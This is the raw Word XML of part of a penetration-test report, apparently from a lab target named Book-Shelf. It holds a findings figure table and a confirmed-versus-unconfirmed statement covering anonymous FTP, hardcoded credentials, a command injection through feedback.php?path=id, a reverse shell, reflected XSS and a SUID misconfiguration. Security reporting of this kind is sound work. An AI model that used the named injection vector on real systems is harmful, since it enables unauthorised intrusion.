    <w:p w14:paraId="0D12B6AD" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Path-traversal-style tests against the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>feedback.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> path parameter did not produce evidence of local file inclusion or directory traversal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F6B94E" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>A GitHub repository URL decoded from a hidden Base64-encoded HTML comment did not resolve to a valid, accessible public repository during testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112FB07E" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Direct authentication/compromise of the MySQL service was not achieved; the connection attempt was rejected by the server's host-based access control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D928C5D" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>D. List of Figures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6750"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C64CEA" w14:paraId="34862DE5" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F2937"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2A1FCDA3" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Figure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F2937"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2120B7D0" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6750" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F2937"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7F3878FB" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C64CEA" w14:paraId="13B8E8D4" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1A9B75A6" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="58FD1168" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>F-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6750" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7F91B425" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Anonymous FTP session, webpass.txt download, and application-specific credential entry</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C64CEA" w14:paraId="06AEC8D4" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F3F4F6"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="37C8CA62" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F3F4F6"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2D08E260" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>F-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6750" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F3F4F6"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="48E14F5F" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Source code disclosure of hardcoded login credentials (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>login.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C64CEA" w14:paraId="01E9C356" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7A5B3445" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="17F1314E" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>F-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6750" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1AFD4917" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Confirmed OS command injection (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>feedback.php?path</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>=id)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C64CEA" w14:paraId="6BDCEB6B" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F3F4F6"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7FF774C2" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F3F4F6"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5347315C" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>F-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6750" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F3F4F6"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6D3D8324" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Reverse shell established as www-data, with exploitation payload shown</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C64CEA" w14:paraId="27C0FDC1" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="15406514" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="627277D2" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>F-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6750" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5C6B9F09" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Unauthenticated access to the admin/profile page (HTTP 200 OK)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C64CEA" w14:paraId="4D784F32" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F3F4F6"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="31D394A7" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F3F4F6"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1CFAA5B5" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>F-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6750" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F3F4F6"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="56B3DED4" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Reflected XSS payload returned unescaped in the HTTP response</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C64CEA" w14:paraId="66CCBB69" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1B830563" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0C7260BD" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>F-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6750" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1AF5E7DD" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SUID binary permissions and failed privilege-escalation attempt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="573E98D7" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00C64CEA">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="177A46F3" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Note: network identification and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>full service</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> enumeration (Nmap) evidence supporting Section 4 (Attack Surface Overview) and F-01/F-08 was captured during reconnaissance and is referenced throughout this report; the corresponding scan output is summarized in Section 4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49009FC2" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>E. Statement of Confirmed vs. Unconfirmed Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FDBA42" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Confirmed findings (documented in Section 5): F-01 Anonymous FTP / Information Disclosure; F-02 Hardcoded Credentials; F-03 OS Command Injection / RCE; F-04 Reverse Shell (exploitation impact of F-03); F-05 Unauthenticated Admin/Profile Access; F-06 Reflected XSS (HTTP-level confirmation); F-07 Writable SUID Binary (misconfiguration confirmed; exploitation not demonstrated); F-08 MySQL Network Exposure (exposure confirmed; compromise not achieved).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDF3538" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Explicitly NOT confirmed / NOT achieved: SQL injection; local file inclusion / path traversal; successful privilege escalation to defender or root; database compromise; browser-executed (as opposed to HTTP-level) confirmation of the reflected XSS payload. This report makes no claim of "full system compromise," "root shell obtained," or "database compromise," as none of these were demonstrated during testing.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00C64CEA">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424C9" w14:textId="77777777" w:rsidR="00083ED0" w:rsidRDefault="00083ED0">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="54EF4E1D" w14:textId="77777777" w:rsidR="00083ED0" w:rsidRDefault="00083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6E8DA" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="6B7280"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">CONFIDENTIAL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ED1762">
      <w:rPr>
        <w:noProof/>
        <w:color w:val="6B7280"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t>2</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ED1762">
      <w:rPr>
        <w:noProof/>
        <w:color w:val="6B7280"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t>3</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A08B5" w14:textId="77777777" w:rsidR="00083ED0" w:rsidRDefault="00083ED0">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="28FE4EDB" w14:textId="77777777" w:rsidR="00083ED0" w:rsidRDefault="00083E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4841" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
    <w:pPr>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:proofErr w:type="gramStart"/>
    <w:r>
      <w:rPr>
        <w:color w:val="6B7280"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t>Book-Shelf</w:t>
    </w:r>
    <w:proofErr w:type="gramEnd"/>
    <w:r>
      <w:rPr>
        <w:color w:val="6B7280"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t>: 1 — Penetration Testing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A19DD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E6B2E886"/>
    <w:lvl w:ilvl="0" w:tplc="1820E650">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="39C46892">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="34DAF95E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="41805F1E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="5A248168">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="192627C4">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="E46EF85A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="24227702">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="159C74B8">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0C0D72F2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="04487670"/>
